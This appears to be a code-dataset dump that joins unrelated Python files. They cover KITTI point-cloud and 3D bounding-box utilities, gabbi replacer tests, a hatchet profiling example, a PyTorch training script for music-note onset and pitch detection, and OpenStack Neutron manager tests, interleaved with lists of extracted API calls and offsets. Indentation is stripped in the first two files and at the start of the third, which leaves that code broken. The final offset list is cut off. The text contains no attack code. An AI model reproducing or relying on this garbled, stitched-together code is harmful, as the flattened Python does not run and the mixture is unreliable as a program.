pts = pts[pts[:, 2] > 0]
point_cloud = pts.T
# Project to image frame
        point_in_im = calib_utils.project_to_image(point_cloud, p=frame_calib.p2).T  # project onto the image plane
        # Filter based on the given image size (keep only points inside the image)
image_filter = (point_in_im[:, 0] > 0) & \
(point_in_im[:, 0] < im_size[0]) & \
(point_in_im[:, 1] > 0) & \
(point_in_im[:, 1] < im_size[1])
if not min_intensity:
return pts[image_filter].T
else:
intensity_filter = i > min_intensity
point_filter = np.logical_and(image_filter, intensity_filter)
return pts[point_filter].T
def get_road_plane(img_idx, planes_dir):
"""Reads the road plane from file
:param int img_idx : Index of image
:param str planes_dir : directory containing plane text files
:return plane : List containing plane equation coefficients
"""
plane_file = planes_dir + '/%06d.txt' % img_idx
with open(plane_file, 'r') as input_file:
lines = input_file.readlines()
input_file.close()
# Plane coefficients stored in 4th row
lines = lines[3].split()
# Convert str to float
lines = [float(i) for i in lines]
plane = np.asarray(lines)
# Ensure normal is always facing up.
# In Kitti's frame of reference, +y is down
if plane[1] > 0:
plane = -plane
# Normalize the plane coefficients
norm = np.linalg.norm(plane[0:3])
plane = plane / norm
return plane
def compute_box_corners_3d(object_label):
"""Computes the 3D bounding box corner positions from an ObjectLabel
:param object_label: ObjectLabel to compute corners from
:return: a numpy array of 3D corners if the box is in front of the camera,
an empty array otherwise
"""
# Compute rotational matrix
rot = np.array([[+np.cos(object_label.ry), 0, +np.sin(object_label.ry)],
[0, 1, 0],
[-np.sin(object_label.ry), 0, +np.cos(object_label.ry)]])
l = object_label.l
w = object_label.w
h = object_label.h
# 3D BB corners
x_corners = np.array(
[l / 2, l / 2, -l / 2, -l / 2, l / 2, l / 2, -l / 2, -l / 2])
y_corners = np.array([0, 0, 0, 0, -h, -h, -h, -h])
z_corners = np.array(
[w / 2, -w / 2, -w / 2, w / 2, w / 2, -w / 2, -w / 2, w / 2])
corners_3d = np.dot(rot, np.array([x_corners, y_corners, z_corners]))
corners_3d[0, :] = corners_3d[0, :] + object_label.t[0]
corners_3d[1, :] = corners_3d[1, :] + object_label.t[1]
corners_3d[2, :] = corners_3d[2, :] + object_label.t[2]
return corners_3d
def project_box3d_to_image(corners_3d, p):
"""Computes the 3D bounding box projected onto
image space.
Keyword arguments:
obj -- object file to draw bounding box
p -- transform matrix
Returns:
corners : numpy array of corner points projected
onto image space.
face_idx: numpy array of 3D bounding box face
"""
    # Corner indices of the 3D bounding box, reshaped to a 4x4 matrix
    # (one row of four corner indices per face)
face_idx = np.array([0, 1, 5, 4, # front face
1, 2, 6, 5, # left face
2, 3, 7, 6, # back face
3, 0, 4, 7]).reshape((4, 4)) # right face
return calib_utils.project_to_image(corners_3d, p), face_idx
def compute_orientation_3d(obj, p):
"""Computes the orientation given object and camera matrix
Keyword arguments:
obj -- object file to draw bounding box
p -- transform matrix
"""
# compute rotational matrix
rot = np.array([[+np.cos(obj.ry), 0, +np.sin(obj.ry)],
[0, 1, 0],
[-np.sin(obj.ry), 0, +np.cos(obj.ry)]])
orientation3d = np.array([0.0, obj.l, 0.0, 0.0, 0.0, 0.0]).reshape(3, 2)
orientation3d = np.dot(rot, orientation3d)
orientation3d[0, :] = orientation3d[0, :] + obj.t[0]
orientation3d[1, :] = orientation3d[1, :] + obj.t[1]
orientation3d[2, :] = orientation3d[2, :] + obj.t[2]
# only draw for boxes that are in front of the camera
for idx in np.arange(orientation3d.shape[1]):
if orientation3d[2, idx] < 0.1:
return None
return calib_utils.project_to_image(orientation3d, p)
def is_point_inside(points, box_corners):
"""Check if each point in a 3D point cloud lies within the 3D bounding box
If we think of the bounding box as having bottom face
defined by [P1, P2, P3, P4] and top face [P5, P6, P7, P8]
then there are three directions on a perpendicular edge:
u = P1 - P2
v = P1 - P4
w = P1 - P5
A point x lies within the box when the following constraints
are respected:
- The dot product u.x is between u.P1 and u.P2
- The dot product v.x is between v.P1 and v.P4
- The dot product w.x is between w.P1 and w.P5
:param points: (3, N) point cloud to test in the form
[[x1...xn], [y1...yn], [z1...zn]]
:param box_corners: 3D corners of the bounding box
:return bool mask of which points are within the bounding box.
Use numpy function .all() to check all points
"""
p1 = box_corners[:, 0]
p2 = box_corners[:, 1]
p4 = box_corners[:, 3]
p5 = box_corners[:, 4]
u = p2 - p1
v = p4 - p1
w = p5 - p1
# if u.P1 < u.x < u.P2
u_dot_x = np.dot(u, points)
u_dot_p1 = np.dot(u, p1)
u_dot_p2 = np.dot(u, p2)
# if v.P1 < v.x < v.P4
v_dot_x = np.dot(v, points)
v_dot_p1 = np.dot(v, p1)
v_dot_p2 = np.dot(v, p4)
# if w.P1 < w.x < w.P5
w_dot_x = np.dot(w, points)
w_dot_p1 = np.dot(w, p1)
w_dot_p2 = np.dot(w, p5)
point_mask = (u_dot_p1 < u_dot_x) & (u_dot_x < u_dot_p2) & \
(v_dot_p1 < v_dot_x) & (v_dot_x < v_dot_p2) & \
(w_dot_p1 < w_dot_x) & (w_dot_x < w_dot_p2)
return point_mask
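# Hedged, self-contained sketch of the containment test above: an axis-aligned
# 2 m cube (ry = 0) whose bottom face sits at y = 0 in camera coordinates;
# since +y points down, the box spans y in [-2, 0], x in [-1, 1], z in [0, 2].
def _demo_is_point_inside():
    box = ObjectLabel()
    box.l, box.w, box.h = 2., 2., 2.
    box.t = (0., 0., 1.)
    corners = compute_box_corners_3d(box)
    # First column is a point inside the box, second is 5 m off to the side.
    points = np.array([[0., 5.], [-1., -1.], [1., 1.]])
    return is_point_inside(points, corners)  # -> array([ True, False])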
def get_point_filter(point_cloud, extents, ground_plane=None, offset_dist=2.0):
"""
Creates a point filter using the 3D extents and ground plane
:param point_cloud: Point cloud in the form [[x,...],[y,...],[z,...]]
:param extents: 3D area in the form
[[min_x, max_x], [min_y, max_y], [min_z, max_z]]
:param ground_plane: Optional, coefficients of the ground plane
(a, b, c, d)
:param offset_dist: If ground_plane is provided, removes points above
this offset from the ground_plane
:return: A binary mask for points within the extents and offset plane
"""
point_cloud = np.asarray(point_cloud)
# Filter points within certain xyz range
x_extents = extents[0]
y_extents = extents[1]
z_extents = extents[2]
extents_filter = (point_cloud[0] > x_extents[0]) & \
(point_cloud[0] < x_extents[1]) & \
(point_cloud[1] > y_extents[0]) & \
(point_cloud[1] < y_extents[1]) & \
(point_cloud[2] > z_extents[0]) & \
(point_cloud[2] < z_extents[1])
if ground_plane is not None:
ground_plane = np.array(ground_plane)
# Calculate filter using ground plane
ones_col = np.ones(point_cloud.shape[1])
padded_points = np.vstack([point_cloud, ones_col])
offset_plane = ground_plane + [0, 0, 0, -offset_dist]
# Create plane filter
dot_prod = np.dot(offset_plane, padded_points)
plane_filter = dot_prod < 0
# Combine the two filters
point_filter = np.logical_and(extents_filter, plane_filter)
else:
# Only use the extents for filtering
point_filter = extents_filter
return point_filter
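# Hedged, self-contained sketch of the filter above: both points fall inside
# the extents, but the second sits more than offset_dist (2 m) above a flat
# ground plane at y = 1.5 (camera coordinates, +y down) and is rejected.
def _demo_get_point_filter():
    point_cloud = np.array([[0.0, 0.0], [0.5, -0.9], [0.0, 0.0]])
    extents = [[-1, 1], [-1, 4], [-1, 1]]
    ground_plane = (0, -1, 0, 1.5)  # plane equation: -y + 1.5 = 0
    return get_point_filter(point_cloud, extents, ground_plane)  # [True, False]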
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A place to put test of the replacers.
"""
import os
import unittest
from gabbi import case
from gabbi import exception
class EnvironReplaceTest(unittest.TestCase):
def test_environ_boolean(self):
"""Environment variables are always strings
That doesn't always suit our purposes, so test that "True"
and "False" become booleans as a special case.
"""
http_case = case.HTTPTestCase('test_request')
message = "$ENVIRON['moo']"
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "False"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "true"
self.assertEqual(True, http_case._environ_replace(message))
os.environ['moo'] = "faLse"
self.assertEqual(False, http_case._environ_replace(message))
os.environ['moo'] = "null"
self.assertEqual(None, http_case._environ_replace(message))
os.environ['moo'] = "1"
self.assertEqual(1, http_case._environ_replace(message))
os.environ['moo'] = "cow"
self.assertEqual("cow", http_case._environ_replace(message))
message = '$ENVIRON["moo"]'
os.environ['moo'] = "True"
self.assertEqual(True, http_case._environ_replace(message))
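# For context (hedged; the gabbi YAML below is illustrative, not part of this
# module): the replacer exercised above lets a gabbi test's request content
# reference environment variables, e.g.
#
#   tests:
#   - name: check flag
#     POST: /resource
#     data:
#       enabled: $ENVIRON['moo']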
class TestReplaceHeaders(unittest.TestCase):
def test_empty_headers(self):
"""A None value in headers should cause a GabbiFormatError."""
http_case = case.HTTPTestCase('test_request')
self.assertRaises(
exception.GabbiFormatError,
http_case._replace_headers_template, 'foo', None)
#!/usr/bin/env python
import hatchet as ht
if __name__ == "__main__":
# Path to caliper json-split file.
json_file = "../../../hatchet/tests/data/caliper-cpi-json/cpi-callpath-profile.json"
# Use hatchet's ``from_caliper_json`` API with the resulting json-split.
# The result is stored into Hatchet's GraphFrame.
gf = ht.GraphFrame.from_caliper_json(json_file)
    # Print out the DataFrame component of the GraphFrame.
print(gf.dataframe)
    # Print out the graph component of the GraphFrame.
# Because no metric parameter is specified, ``time`` is used by default.
print(gf.tree())
|
[
"hatchet.GraphFrame.from_caliper_json"
] |
[((342, 384), 'hatchet.GraphFrame.from_caliper_json', 'ht.GraphFrame.from_caliper_json', (['json_file'], {}), '(json_file)\n', (373, 384), True, 'import hatchet as ht\n')]
|
from options import opt
import os
from pathlib import Path
import json
import numpy as np
from dataset import NoteDataset, get_loader
import torch
from model import Rnn, BiRNN, NeuralNet, NeuralNetWithRNN
import torch.nn as nn
import copy
from tqdm import tqdm
from torch.optim.lr_scheduler import ReduceLROnPlateau
from visual import visualization
def preprocess(data_seq, label):
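    # Frame-level labelling (as implied by the loop below): frames advance in
    # 32 ms hops, so frame j is centred at j * 0.032 + 0.016 s. Each frame
    # receives a 3-dim target [is_onset, is_offset, pitch]; a frame counts as
    # an onset/offset when its centre lies within 17 ms of the annotated time.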
    new_label = []
for i in range(len(label)):
label_of_one_song = []
cur_note = 0
cur_note_onset = label[i][cur_note][0]
cur_note_offset = label[i][cur_note][1]
cur_note_pitch = label[i][cur_note][2]
for j in range(len(data_seq[i])):
cur_time = j * 0.032 + 0.016
if abs(cur_time - cur_note_onset) < 0.017:
label_of_one_song.append(np.array([1, 0, cur_note_pitch]))
elif cur_time < cur_note_onset or cur_note >= len(label[i]):
label_of_one_song.append(np.array([0, 0, 0.0]))
elif abs(cur_time - cur_note_offset) < 0.017:
label_of_one_song.append(np.array([0, 1, cur_note_pitch]))
cur_note = cur_note + 1
if cur_note < len(label[i]):
cur_note_onset = label[i][cur_note][0]
cur_note_offset = label[i][cur_note][1]
cur_note_pitch = label[i][cur_note][2]
else:
label_of_one_song.append(np.array([0, 0, cur_note_pitch]))
new_label.append(label_of_one_song)
return new_label
def train():
data_set = NoteDataset(data_seq, label)
train_loader, valid_loader = get_loader(data_set)
# model = Rnn(opt.input_dim, opt.hidden_size)
# model = BiRNN(opt.input_dim, opt.hidden_size, opt.num_layers)
# model=NeuralNet(opt.input_dim,[34,51,34,17])
    model = NeuralNetWithRNN(opt.input_dim, [34, 51, 34, 17])
model = model.cuda(opt.cuda_devices)
best_model_params = copy.deepcopy(model.state_dict())
best_loss = float('inf')
training_loss_list = []
valid_loss_list = []
criterion_onset = nn.BCEWithLogitsLoss()
criterion_pitch = nn.SmoothL1Loss()
optimizer = torch.optim.Adam(model.parameters(), lr=opt.lr)
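    # Halve the learning rate whenever the validation loss stops improving
    # for two consecutive epochs (see scheduler.step(valid_loss) below).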
scheduler = ReduceLROnPlateau(optimizer, mode='min', factor=0.5, patience=2, verbose=True, min_lr=1e-8)
record = open('record.txt', 'w')
for epoch in range(opt.epochs):
print(f'Epoch: {epoch + 1}/{opt.epochs}')
print('-' * len(f'Epoch: {epoch + 1}/{opt.epochs}'))
training_loss = 0.0
valid_loss = 0.0
total_length=0.0
model.train()
for i, sample in enumerate(tqdm(train_loader)):
inputs = sample['data']
inputs = torch.FloatTensor(inputs)
inputs = inputs.permute(1, 0, 2)
inputs = inputs.cuda(opt.cuda_devices)
target = sample['label']
target = torch.FloatTensor(target)
target = target.permute(1, 0, 2)
target = target.cuda(opt.cuda_devices)
inputs_length = list(inputs.shape)[0]
optimizer.zero_grad()
output1, output2 = model(inputs)
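            # Target layout: channels 0-1 are the onset/offset flags (BCE loss),
            # channel 2 is the pitch value (smooth-L1 loss).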
onset_loss = criterion_onset(output1, torch.narrow(target, dim=2, start=0, length=2))
pitch_loss = criterion_pitch(output2, torch.narrow(target, dim=2, start=2, length=1))
total_loss = onset_loss + pitch_loss
training_loss = training_loss + total_loss.item()
total_length += 1
total_loss.backward()
optimizer.step()
training_loss /= total_length
training_loss_list.append(training_loss)
print(f'training_loss: {training_loss:.4f}')
model.eval()
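        # Validation pass: gradients are still computed here but never applied;
        # wrapping this loop in torch.no_grad() would save memory.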
total_length = 0
for i, sample in enumerate(tqdm(valid_loader)):
inputs = sample['data']
inputs = torch.FloatTensor(inputs)
inputs = inputs.permute(1, 0, 2)
inputs = inputs.cuda(opt.cuda_devices)
target = sample['label']
target = torch.FloatTensor(target)
target = target.permute(1, 0, 2)
target = target.cuda(opt.cuda_devices)
inputs_length = list(inputs.shape)[0]
optimizer.zero_grad()
output1, output2 = model(inputs)
onset_loss = criterion_onset(output1, torch.narrow(target, dim=2, start=0, length=2))
pitch_loss = criterion_pitch(output2, torch.narrow(target, dim=2, start=2, length=1))
total_loss = onset_loss + pitch_loss
valid_loss = valid_loss + total_loss.item()
total_length += 1
valid_loss /= total_length
valid_loss_list.append(valid_loss)
print(f'valid_loss: {valid_loss:.4f}\n')
scheduler.step(valid_loss)
if valid_loss < best_loss:
best_loss = valid_loss
best_training_loss = training_loss
best_model_params = copy.deepcopy(model.state_dict())
if (epoch + 1) % 50 == 0:
model.load_state_dict(best_model_params)
weight_path = Path(opt.checkpoint_dir).joinpath(
f'model-{epoch + 1}epoch-{best_loss:.02f}-best_valid_loss.pth')
torch.save(model, str(weight_path))
record.write(f'{epoch + 1}\n')
record.write(f'Best training loss: {best_training_loss:.4f}\n')
record.write(f'Best valid loss: {best_loss:.4f}\n')
print(f'Best training loss: {best_training_loss:.4f}')
print(f'Best valid loss: {best_loss:.4f}')
model.load_state_dict(best_model_params)
weight_path = Path(opt.checkpoint_dir).joinpath(f'model-{best_loss:.02f}-best_valid_loss.pth')
torch.save(model, str(weight_path))
visualization(training_loss_list, valid_loss_list)
return model
if __name__ == '__main__':
THE_FOLDER = opt.data_root
data_seq = []
label = []
for the_dir in os.listdir(THE_FOLDER):
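        # Each song directory <name> is expected to contain
        # <name>_feature.json, <name>_groundtruth.txt and <name>_link.txt.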
json_path = Path(THE_FOLDER).joinpath(the_dir).joinpath(the_dir+'_feature.json')
gt_path = Path(THE_FOLDER).joinpath(the_dir).joinpath(the_dir+'_groundtruth.txt')
youtube_link_path = Path(THE_FOLDER).joinpath(the_dir).joinpath(the_dir+'_link.txt')
with open(json_path,'r') as json_file:
temp = json.loads(json_file.read())
data = []
for key, value in temp.items():
data.append(value)
#print(key)
data = np.array(data).T
data_seq.append(data)
gtdata = np.loadtxt(gt_path)
label.append(gtdata)
    label = preprocess(data_seq, label)
model = train()
|
[
"tqdm.tqdm",
"torch.narrow",
"dataset.NoteDataset",
"torch.nn.BCEWithLogitsLoss",
"torch.optim.lr_scheduler.ReduceLROnPlateau",
"torch.FloatTensor",
"model.NeuralNetWithRNN",
"pathlib.Path",
"dataset.get_loader",
"numpy.array",
"numpy.loadtxt",
"torch.nn.SmoothL1Loss",
"visual.visualization",
"os.listdir"
] |
[((1566, 1594), 'dataset.NoteDataset', 'NoteDataset', (['data_seq', 'label'], {}), '(data_seq, label)\n', (1577, 1594), False, 'from dataset import NoteDataset, get_loader\n'), ((1628, 1648), 'dataset.get_loader', 'get_loader', (['data_set'], {}), '(data_set)\n', (1638, 1648), False, 'from dataset import NoteDataset, get_loader\n'), ((1828, 1877), 'model.NeuralNetWithRNN', 'NeuralNetWithRNN', (['opt.input_dim', '[34, 51, 34, 17]'], {}), '(opt.input_dim, [34, 51, 34, 17])\n', (1844, 1877), False, 'from model import Rnn, BiRNN, NeuralNet, NeuralNetWithRNN\n'), ((2079, 2101), 'torch.nn.BCEWithLogitsLoss', 'nn.BCEWithLogitsLoss', ([], {}), '()\n', (2099, 2101), True, 'import torch.nn as nn\n'), ((2124, 2141), 'torch.nn.SmoothL1Loss', 'nn.SmoothL1Loss', ([], {}), '()\n', (2139, 2141), True, 'import torch.nn as nn\n'), ((2222, 2319), 'torch.optim.lr_scheduler.ReduceLROnPlateau', 'ReduceLROnPlateau', (['optimizer'], {'mode': '"""min"""', 'factor': '(0.5)', 'patience': '(2)', 'verbose': '(True)', 'min_lr': '(1e-08)'}), "(optimizer, mode='min', factor=0.5, patience=2, verbose=\n True, min_lr=1e-08)\n", (2239, 2319), False, 'from torch.optim.lr_scheduler import ReduceLROnPlateau\n'), ((5786, 5836), 'visual.visualization', 'visualization', (['training_loss_list', 'valid_loss_list'], {}), '(training_loss_list, valid_loss_list)\n', (5799, 5836), False, 'from visual import visualization\n'), ((5969, 5991), 'os.listdir', 'os.listdir', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (5979, 5991), False, 'import os\n'), ((6556, 6575), 'numpy.loadtxt', 'np.loadtxt', (['gt_path'], {}), '(gt_path)\n', (6566, 6575), True, 'import numpy as np\n'), ((2650, 2668), 'tqdm.tqdm', 'tqdm', (['train_loader'], {}), '(train_loader)\n', (2654, 2668), False, 'from tqdm import tqdm\n'), ((2728, 2753), 'torch.FloatTensor', 'torch.FloatTensor', (['inputs'], {}), '(inputs)\n', (2745, 2753), False, 'import torch\n'), ((2909, 2934), 'torch.FloatTensor', 'torch.FloatTensor', (['target'], {}), '(target)\n', (2926, 2934), False, 'import torch\n'), ((3813, 3831), 'tqdm.tqdm', 'tqdm', (['valid_loader'], {}), '(valid_loader)\n', (3817, 3831), False, 'from tqdm import tqdm\n'), ((3891, 3916), 'torch.FloatTensor', 'torch.FloatTensor', (['inputs'], {}), '(inputs)\n', (3908, 3916), False, 'import torch\n'), ((4072, 4097), 'torch.FloatTensor', 'torch.FloatTensor', (['target'], {}), '(target)\n', (4089, 4097), False, 'import torch\n'), ((5661, 5685), 'pathlib.Path', 'Path', (['opt.checkpoint_dir'], {}), '(opt.checkpoint_dir)\n', (5665, 5685), False, 'from pathlib import Path\n'), ((6491, 6505), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (6499, 6505), True, 'import numpy as np\n'), ((3213, 3259), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(0)', 'length': '(2)'}), '(target, dim=2, start=0, length=2)\n', (3225, 3259), False, 'import torch\n'), ((3311, 3357), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(2)', 'length': '(1)'}), '(target, dim=2, start=2, length=1)\n', (3323, 3357), False, 'import torch\n'), ((4376, 4422), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(0)', 'length': '(2)'}), '(target, dim=2, start=0, length=2)\n', (4388, 4422), False, 'import torch\n'), ((4474, 4520), 'torch.narrow', 'torch.narrow', (['target'], {'dim': '(2)', 'start': '(2)', 'length': '(1)'}), '(target, dim=2, start=2, length=1)\n', (4486, 4520), False, 'import torch\n'), ((809, 841), 'numpy.array', 'np.array', (['[1, 0, cur_note_pitch]'], {}), '([1, 0, cur_note_pitch])\n', (817, 841), True, 'import numpy as np\n'), ((5144, 5168), 'pathlib.Path', 'Path', (['opt.checkpoint_dir'], {}), '(opt.checkpoint_dir)\n', (5148, 5168), False, 'from pathlib import Path\n'), ((957, 978), 'numpy.array', 'np.array', (['[0, 0, 0.0]'], {}), '([0, 0, 0.0])\n', (965, 978), True, 'import numpy as np\n'), ((6013, 6029), 'pathlib.Path', 'Path', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (6017, 6029), False, 'from pathlib import Path\n'), ((6100, 6116), 'pathlib.Path', 'Path', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (6104, 6116), False, 'from pathlib import Path\n'), ((6200, 6216), 'pathlib.Path', 'Path', (['THE_FOLDER'], {}), '(THE_FOLDER)\n', (6204, 6216), False, 'from pathlib import Path\n'), ((1079, 1111), 'numpy.array', 'np.array', (['[0, 1, cur_note_pitch]'], {}), '([0, 1, cur_note_pitch])\n', (1087, 1111), True, 'import numpy as np\n'), ((1435, 1467), 'numpy.array', 'np.array', (['[0, 0, cur_note_pitch]'], {}), '([0, 0, cur_note_pitch])\n', (1443, 1467), True, 'import numpy as np\n')]
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import types
import fixtures
from oslo.config import cfg
from neutron.common import config
from neutron.manager import NeutronManager
from neutron.manager import validate_post_plugin_load
from neutron.manager import validate_pre_plugin_load
from neutron.openstack.common import log as logging
from neutron.plugins.common import constants
from neutron.tests import base
from neutron.tests.unit import dummy_plugin
LOG = logging.getLogger(__name__)
DB_PLUGIN_KLASS = 'neutron.db.db_base_plugin_v2.NeutronDbPluginV2'
ROOTDIR = os.path.dirname(os.path.dirname(__file__))
ETCDIR = os.path.join(ROOTDIR, 'etc')
def etcdir(*p):
return os.path.join(ETCDIR, *p)
class MultiServiceCorePlugin(object):
supported_extension_aliases = ['lbaas', 'dummy']
class CorePluginWithAgentNotifiers(object):
agent_notifiers = {'l3': 'l3_agent_notifier',
'dhcp': 'dhcp_agent_notifier'}
class NeutronManagerTestCase(base.BaseTestCase):
def setUp(self):
super(NeutronManagerTestCase, self).setUp()
args = ['--config-file', etcdir('neutron.conf.test')]
        # If test_config specifies a config file, use it as well
config.parse(args=args)
NeutronManager._instance = None
self.addCleanup(cfg.CONF.reset)
self.useFixture(
fixtures.MonkeyPatch('neutron.manager.NeutronManager._instance'))
def test_service_plugin_is_loaded(self):
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
mgr = NeutronManager.get_instance()
plugin = mgr.get_service_plugins()[constants.DUMMY]
self.assertTrue(
isinstance(plugin,
(dummy_plugin.DummyServicePlugin, types.ClassType)),
"loaded plugin should be of type neutronDummyPlugin")
def test_service_plugin_by_name_is_loaded(self):
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
cfg.CONF.set_override("service_plugins", ["dummy"])
mgr = NeutronManager.get_instance()
plugin = mgr.get_service_plugins()[constants.DUMMY]
self.assertTrue(
isinstance(plugin,
(dummy_plugin.DummyServicePlugin, types.ClassType)),
"loaded plugin should be of type neutronDummyPlugin")
def test_multiple_plugins_specified_for_service_type(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin",
"neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_multiple_plugins_by_name_specified_for_service_type(self):
cfg.CONF.set_override("service_plugins", ["dummy", "dummy"])
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_multiple_plugins_mixed_specified_for_service_type(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin", "dummy"])
cfg.CONF.set_override("core_plugin", DB_PLUGIN_KLASS)
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_service_plugin_conflicts_with_core_plugin(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
cfg.CONF.set_override("core_plugin",
"neutron.tests.unit.test_neutron_manager."
"MultiServiceCorePlugin")
self.assertRaises(ValueError, NeutronManager.get_instance)
def test_core_plugin_supports_services(self):
cfg.CONF.set_override("core_plugin",
"neutron.tests.unit.test_neutron_manager."
"MultiServiceCorePlugin")
mgr = NeutronManager.get_instance()
svc_plugins = mgr.get_service_plugins()
self.assertEqual(3, len(svc_plugins))
self.assertIn(constants.CORE, svc_plugins.keys())
self.assertIn(constants.LOADBALANCER, svc_plugins.keys())
self.assertIn(constants.DUMMY, svc_plugins.keys())
def test_post_plugin_validation(self):
cfg.CONF.import_opt('dhcp_agents_per_network',
'neutron.db.agentschedulers_db')
self.assertIsNone(validate_post_plugin_load())
cfg.CONF.set_override('dhcp_agents_per_network', 2)
self.assertIsNone(validate_post_plugin_load())
cfg.CONF.set_override('dhcp_agents_per_network', 0)
self.assertIsNotNone(validate_post_plugin_load())
cfg.CONF.set_override('dhcp_agents_per_network', -1)
self.assertIsNotNone(validate_post_plugin_load())
def test_pre_plugin_validation(self):
self.assertIsNotNone(validate_pre_plugin_load())
cfg.CONF.set_override('core_plugin', 'dummy.plugin')
self.assertIsNone(validate_pre_plugin_load())
def test_manager_gathers_agent_notifiers_from_service_plugins(self):
cfg.CONF.set_override("service_plugins",
["neutron.tests.unit.dummy_plugin."
"DummyServicePlugin"])
cfg.CONF.set_override("core_plugin",
"neutron.tests.unit.test_neutron_manager."
"CorePluginWithAgentNotifiers")
expected = {'l3': 'l3_agent_notifier',
'dhcp': 'dhcp_agent_notifier',
'dummy': 'dummy_agent_notifier'}
core_plugin = NeutronManager.get_plugin()
self.assertEqual(expected, core_plugin.agent_notifiers)
|
[
"neutron.manager.validate_pre_plugin_load",
"oslo.config.cfg.CONF.import_opt",
"neutron.openstack.common.log.getLogger",
"oslo.config.cfg.CONF.set_override",
"fixtures.MonkeyPatch",
"os.path.dirname",
"neutron.manager.NeutronManager.get_instance",
"neutron.common.config.parse",
"neutron.manager.NeutronManager.get_plugin",
"os.path.join",
"neutron.manager.validate_post_plugin_load"
] |
[((1120, 1147), 'neutron.openstack.common.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1137, 1147), True, 'from neutron.openstack.common import log as logging\n'), ((1277, 1305), 'os.path.join', 'os.path.join', (['ROOTDIR', '"""etc"""'], {}), "(ROOTDIR, 'etc')\n", (1289, 1305), False, 'import os\n'), ((1241, 1266), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (1256, 1266), False, 'import os\n'), ((1335, 1359), 'os.path.join', 'os.path.join', (['ETCDIR', '*p'], {}), '(ETCDIR, *p)\n', (1347, 1359), False, 'import os\n'), ((1867, 1890), 'neutron.common.config.parse', 'config.parse', ([], {'args': 'args'}), '(args=args)\n', (1879, 1890), False, 'from neutron.common import config\n'), ((2128, 2181), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (2149, 2181), False, 'from oslo.config import cfg\n'), ((2190, 2291), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (2211, 2291), False, 'from oslo.config import cfg\n'), ((2365, 2394), 'neutron.manager.NeutronManager.get_instance', 'NeutronManager.get_instance', ([], {}), '()\n', (2392, 2394), False, 'from neutron.manager import NeutronManager\n'), ((2716, 2769), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (2737, 2769), False, 'from oslo.config import cfg\n'), ((2778, 2829), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['dummy']"], {}), "('service_plugins', ['dummy'])\n", (2799, 2829), False, 'from oslo.config import cfg\n'), ((2844, 2873), 'neutron.manager.NeutronManager.get_instance', 'NeutronManager.get_instance', ([], {}), '()\n', (2871, 2873), False, 'from neutron.manager import NeutronManager\n'), ((3206, 3365), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['neutron.tests.unit.dummy_plugin.DummyServicePlugin',\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin']"], {}), "('service_plugins', [\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin',\n 'neutron.tests.unit.dummy_plugin.DummyServicePlugin'])\n", (3227, 3365), False, 'from oslo.config import cfg\n'), ((3494, 3547), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""core_plugin"""', 'DB_PLUGIN_KLASS'], {}), "('core_plugin', DB_PLUGIN_KLASS)\n", (3515, 3547), False, 'from oslo.config import cfg\n'), ((3696, 3756), 'oslo.config.cfg.CONF.set_override', 'cfg.CONF.set_override', (['"""service_plugins"""', "['dummy', 'dummy']"], {}), "('service_plugins', ['dummy', 'dummy'])\n", (3717, 3756), False, 'from oslo.config import cfg\n'), ((3765, 3818), 